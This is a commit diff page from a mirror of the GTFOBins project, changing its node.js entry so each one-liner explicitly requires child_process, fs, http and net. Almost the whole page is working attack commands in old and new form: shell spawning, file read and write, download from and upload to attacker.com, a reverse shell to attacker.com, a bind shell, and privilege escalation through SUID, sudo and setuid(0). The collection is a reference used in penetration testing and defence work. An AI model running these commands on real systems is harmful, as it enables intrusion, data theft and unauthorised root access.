mirror/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 07:49:17 +01:00
Code Issues

Explicitly require libraries in node

Browse Source 
Close #315.
This commit is contained in:
Andrea Cardaci 2022-09-08 21:03:11 +02:00
parent 3f62ed36f2
commit 6a707c0132
1 changed files with 12 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
_gtfobins/node.md
View File

@ -2,30 +2,30 @@
functions: functions:
shell: shell:
- code: | - code: |
node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})' node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'
file-write: file-write:
- code: node -e 'fs.writeFileSync("file_to_write", "DATA")' - code: node -e 'require("fs").writeFileSync("file_to_write", "DATA")'
file-read: file-read:
- code: node -e 'process.stdout.write(fs.readFileSync("/bin/ls"))' - code: node -e 'process.stdout.write(require("fs").readFileSync("/bin/ls"))'
file-download: file-download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
export LFILE=file_to_save export LFILE=file_to_save
node -e 'http.get(process.env.URL, res => res.pipe(fs.createWriteStream(process.env.LFILE)))' node -e 'require("http").get(process.env.URL, res => res.pipe(require("fs").createWriteStream(process.env.LFILE)))'
file-upload: file-upload:
- description: Send a local file via HTTP POST request. - description: Send a local file via HTTP POST request.
code: | code: |
export URL=http://attacker.com export URL=http://attacker.com
export LFILE=file_to_send export LFILE=file_to_send
node -e 'fs.createReadStream(process.env.LFILE).pipe(http.request(process.env.URL))' node -e 'require("fs").createReadStream(process.env.LFILE).pipe(require("http").request(process.env.URL))'
reverse-shell: reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
node -e 'sh = child_process.spawn("/bin/sh"); node -e 'sh = require("child_process").spawn("/bin/sh");
net.connect(process.env.RPORT, process.env.RHOST, function () { require("net").connect(process.env.RPORT, process.env.RHOST, function () {
this.pipe(sh.stdin); this.pipe(sh.stdin);
sh.stdout.pipe(this); sh.stdout.pipe(this);
sh.stderr.pipe(this); sh.stderr.pipe(this);
@ -34,19 +34,19 @@ functions:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: | code: |
export LPORT=12345 export LPORT=12345
node -e 'sh = child_process.spawn("/bin/sh"); node -e 'sh = require("child_process").spawn("/bin/sh");
net.createServer(function (client) { require("net").createServer(function (client) {
client.pipe(sh.stdin); client.pipe(sh.stdin);
sh.stdout.pipe(client); sh.stdout.pipe(client);
sh.stderr.pipe(client); sh.stderr.pipe(client);
}).listen(process.env.LPORT)' }).listen(process.env.LPORT)'
suid: suid:
- code: | - code: |
./node -e 'child_process.spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]})' ./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]})'
sudo: sudo:
- code: | - code: |
sudo node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})' sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'
capabilities: capabilities:
- code: | - code: |
./node -e 'process.setuid(0); child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})' ./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'
--- ---